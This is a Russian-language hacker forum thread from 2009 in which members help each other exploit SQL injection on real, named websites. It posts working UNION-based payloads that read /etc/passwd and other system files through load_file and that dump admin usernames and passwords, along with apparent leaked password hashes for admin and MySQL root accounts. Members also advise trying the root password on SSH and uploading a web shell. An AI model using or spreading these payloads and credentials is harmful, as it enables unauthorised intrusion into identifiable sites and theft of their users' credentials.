Ваши вопросы по уязвимостям.

[x60]unu · 5 Dec 2009

Cybersteger said:

В поле http://www.site.ru/pop/search.cgi?q='

Software error:

DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.

Это SQL инекция ? Тогда как раскрутить?
Click to expand...

скорее всего да
если там идут числовые значения то можно попробовать так
http://www.site.ru/pop/search.cgi?q=2-1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=2
ну а так сайт в ЛС если не трудно

mailbrush · 6 Dec 2009

Кинь сайт в личку, или пробуй:
Code:
http://www.site.ru/pop/search.cgi?q=1)+order+by+1%23

547 · 6 Dec 2009

есть функция load_file
magic_quotes_on
удалось прочитать несколько файлов, вот только их содержимое несовсем понятно што из этого можна извлечь полезного (в мозиле у меня все отобразилось в непонятных кодах,в гугл хроме нормально)
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file%280x2f7661722f61646d2f77746d70%29,3,4,5--
/var/adm/wtmp
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f75746d70),3,4,5--
/var/adm/qacct

ILYAtirtir · 6 Dec 2009

админка:

Code:

forester:*676243218923905CF94CB52A3C9D3EB30CE8E20D
bsimpson:*81BDE0E8E0BA1F502F94C27035B496267B88E712

mysql:

Code:

root:*E73484FBEEB33C026E5ADBCA26E267B837C846E3:Y

x[0]x · 6 Dec 2009

547 said:

-есть функция load_file
-што из этого можна извлечь полезного
Click to expand...

обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
ЗЫ Задай себе вопрос- что я хочу?

547 · 6 Dec 2009

x[0]x said:

обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
ЗЫ Задай себе вопрос- что я хочу?
Click to expand...

да мнебы конфиги, или возможно логи прочитать)
но я с етой системой незнаком(

wolmer · 6 Dec 2009

Такой вопрос по mysql-inj...
Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)(т.е. есть иньекция в параметре update)

Как это сделать? И возможно ли?

x[0]x · 6 Dec 2009

547 said:

да мнебы конфиги, или возможно логи прочитать)
но я с етой системой незнаком(
Click to expand...

никс ситемка
------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f706173737764),3,4,5-- /etc/passwd
-------------------

x[0]x · 6 Dec 2009

wolmer said:

Такой вопрос по mysql-inj...
Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)

Как это сделать? И возможно ли?
Click to expand...

какими средствами ты распологаешь? доступ? права?

wolmer · 6 Dec 2009

x[0]x said:

какими средствами ты распологаешь? доступ? права?
Click to expand...

Подправил пост (точно сформулировал теперь)

mailbrush · 6 Dec 2009

Code:

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4,5+from+admin_users--

Spyder, а ТЫ залил шелл? )

547 · 6 Dec 2009

x[0]x said:

никс ситемка
------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f706173737764),3,4,5-- /etc/passwd
-------------------
Click to expand...

да я /etc/passwd в первую очередь прочитал)
но там всеравно сильно невыжмеш с нее(
кавычка слешируется)

547 · 6 Dec 2009

mailbrush said:
Code:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4,5+from+admin_users--
Spyder, а ТЫ залил шелл? )
Click to expand...
сомниваюсь штобы Spyder залил...
каким образом?
через логи?

mailbrush · 6 Dec 2009

547 said:

сомниваюсь штобы Spyder залил...
каким образом?
через логи?
Click to expand...

А ты не сомневайся

x[0]x · 6 Dec 2009

547 said:

сомниваюсь штобы Spyder залил...
каким образом?
через логи?
Click to expand...

reverse ip => выбирай сайты - читалка у тебя есть.

можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку

хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
)
сложи 1+1 )

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)

547 · 6 Dec 2009

x[0]x said:

reverse ip => выбирай сайты - читалка у тебя есть.

можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку

хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
)
сложи 1+1 )

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)
Click to expand...

да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...

mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)

mailbrush · 6 Dec 2009

547 said:

да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...

mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)
Click to expand...

У тебя нету нестандартного мышления

547 · 6 Dec 2009

mailbrush said:

У тебя нету нестандартного мышления
Click to expand...

с чего ты взял?

mailbrush · 6 Dec 2009

С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

PS:
Code:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,2,3,4,load_file(0x2F746D702F6D61696C6272757368)

MaydDay · 6 Dec 2009

можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='

Ваши вопросы по уязвимостям.

[x60]unu Banned

mailbrush Well-Known Member

547 Active Member

ILYAtirtir Elder - Старейшина

x[0]x Banned

547 Active Member

wolmer Member

x[0]x Banned

x[0]x Banned

wolmer Member

mailbrush Well-Known Member

547 Active Member

547 Active Member

mailbrush Well-Known Member

x[0]x Banned

547 Active Member

mailbrush Well-Known Member

547 Active Member

mailbrush Well-Known Member

MaydDay New Member

Useful Searches

Ваши вопросы по уязвимостям.

[x60]unu Banned

mailbrush Well-Known Member

547 Active Member

ILYAtirtir Elder - Старейшина

x[0]x Banned

547 Active Member

wolmer Member

x[0]x Banned

x[0]x Banned

wolmer Member

mailbrush Well-Known Member

547 Active Member

547 Active Member

mailbrush Well-Known Member

x[0]x Banned

547 Active Member

mailbrush Well-Known Member

547 Active Member

mailbrush Well-Known Member

MaydDay New Member